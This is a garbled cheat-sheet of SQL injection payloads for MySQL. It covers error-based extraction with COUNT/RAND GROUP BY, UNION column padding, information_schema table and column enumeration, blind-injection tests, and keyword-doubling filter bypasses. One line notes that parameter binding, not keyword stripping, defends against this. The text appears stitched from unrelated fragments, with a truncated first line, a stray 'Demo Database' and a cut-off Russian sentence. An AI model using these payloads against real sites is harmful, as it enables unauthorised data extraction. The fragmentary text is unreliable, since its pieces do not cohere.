...1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast
select a,b,null,null from table1 union select null,null,c,d from table2 union select null,null,null,null,e,f from table3.
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'columnname';#find tables that have a column called 'columnname' and 0<(select count(xxx) from tbl_user) and 1<2 #blind injection: column enumeration.
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))).
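As we can see, [select] is filtered out, so the [Replacing keywords] method doubles the keyword, like this: SeLselectECT. It gets through only because the filter deletes the keyword in a single pass, which is why keyword stripping is not a defence against injection; binding the input as a query parameter is.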
SELECT column_names FROM table_name WHERE column_name IS NOT NULL; Demo Database.
UNION SELECT ByPassing method. +union+distinct+select+.
select * from users where id='12'. а ссылка будет выглядеть вот так